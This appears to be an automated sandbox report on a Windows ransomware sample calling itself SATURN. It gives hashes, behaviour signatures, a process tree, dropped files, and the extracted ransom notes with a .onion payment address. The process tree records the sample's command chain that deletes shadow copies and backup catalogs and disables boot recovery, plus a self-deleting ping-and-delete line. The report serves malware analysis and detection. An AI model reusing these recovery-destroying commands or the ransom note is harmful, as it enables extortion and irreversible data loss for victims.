Analysis
-
max time kernel
188s -
max time network
194s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
30-05-2022 18:35
General
-
Target
096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
-
Size
499KB
-
MD5
1004596e635c155c0b073d3d76349985
-
SHA1
fba141902dfc4a7331b9f9748e6f36b7dcb623f7
-
SHA256
096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f
-
SHA512
5c7afcc7bed629659ed0c02313e88255f0c2d58400c73d5aa1f860a64ffac77936e299e4be54ca59174f820d103fcc6c39e066ef1a1bc81bbbd40cd49f8d4568
Score
10/10
Malware Config
Extracted
Path
C:\odt\#DECRYPT_MY_FILES#.txt
Ransom Note
S A T U R N
All of your files have been encrypted!
To Decrypt your files follow these steps:
#---------------------------------------------#
1. Download and install the "Tor Browser" from https://www.torproject.org
2. Run it.
3. In the Tor Browser, open website:
http://su34pwhpcafeiztt.onion
4. Follow the instructions on the page
#---------------------------------------------#
URLs
http://su34pwhpcafeiztt.onion
Extracted
Path
C:\odt\#DECRYPT_MY_FILES#.html
Ransom Note
<html>
<title>S A T U R N</title>
<center>
<body>
<h1>S A T U R N</h1>
<h4>Your documents, photos, databases, and other important files have been encrypted!</h4>
<br /> To Decrypt your files follow these instructions:
<br />
<div>
<h4>1. Download and Install Tor Browser from <a href=https://www.torproject.org/>https://www.torproject.org/</a></h4>
<br />
<h4>2. Run the browser</h4>
<br />
<h4>3. In the Tor Browser, open website:</h3>
<div style="background-color: #d9d9d9; margin-left: 20px; margin-right: 20px; padding-bottom: 8px; padding-left: 8px; padding-right: 8px; padding-top: 8px;">
</a><b>http://su34pwhpcafeiztt.onion</b><br/>
</div>
<h4>4. Follow the instructions at this website</h4>
</div>
</body>
</center>
</html>
<style>
html {
background-color: white;
font-family: Helvetica, sans-serif;
}
div {
background-color: #f2f2f2;
width: 80: %;
padding: 25px;
margin: 25px;
overflow:hidden;
}
</style>
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Enumerates VirtualBox registry keys 2 TTPs
-
Looks for VirtualBox Guest Additions in registry 2 TTPs
-
Modifies extensions of user files 22 IoCs
Ransomware generally changes the extension on encrypted files.
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 3 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 47 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe"C:\Users\Admin\AppData\Local\Temp\096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe"1⤵
- Modifies extensions of user files
- Checks BIOS information in registry
- Checks computer location settings
- Drops startup file
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet & wmic.exe shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic.exe shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.txt2⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.vbs"2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.html2⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0x9c,0x104,0x7ffe723046f8,0x7ffe72304708,0x7ffe723047183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,1065259785660466374,12742793112634395858,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,1065259785660466374,12742793112634395858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,1065259785660466374,12742793112634395858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:83⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30003⤵
- Runs ping.exe
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4f4 0x5041⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.txtFilesize
407B
MD5f3d19c544c10a8337a7d9f7aef079a43
SHA1252612bbdbdbe790853fe560ce5ce8e1df5fcdc5
SHA256b660c9236f4d6d9b62eb04b40599e852f979dd3dbfd1d03e545a287fe8e5d32b
SHA512c5cd69e7134f6d587d0823f6e7f9e5ba6affd75f5398fcea96e299dfb57996234ba87abe4632b2de807a4b79bbafd1b1132ae55b18a815eb8c4112b48942fb1b
-
C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.vbsFilesize
185B
MD523e0e8c821b40253c04d561a6d06e253
SHA15df1808c8485ad1d90f1431adfa2694dbb1ed693
SHA25654905816b33af2b53b2e127e0a7db664d126700b3fdd360894b9d924544f639a
SHA51287a57f1615db68d57381b1a8602c92e57e3a8bf447ed842f410e50efd13a7f7ba44998b00d5e54238f09cad24ffe59c3aa788c1390364c465c761f3da6a688e8
-
\??\pipe\LOCAL\crashpad_3088_DGOPUJRJNZSYXMRQMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/564-134-0x0000000000000000-mapping.dmp
-
memory/1460-133-0x0000000000000000-mapping.dmp
-
memory/1476-130-0x0000000000400000-0x0000000000480000-memory.dmpFilesize
512KB
-
memory/1996-131-0x0000000000000000-mapping.dmp
-
memory/2112-143-0x0000000000000000-mapping.dmp
-
memory/3088-136-0x0000000000000000-mapping.dmp
-
memory/3140-139-0x0000000000000000-mapping.dmp
-
memory/3192-146-0x0000000000000000-mapping.dmp
-
memory/3440-142-0x0000000000000000-mapping.dmp
-
memory/3516-132-0x0000000000000000-mapping.dmp
-
memory/3940-137-0x0000000000000000-mapping.dmp
-
memory/4332-138-0x0000000000000000-mapping.dmp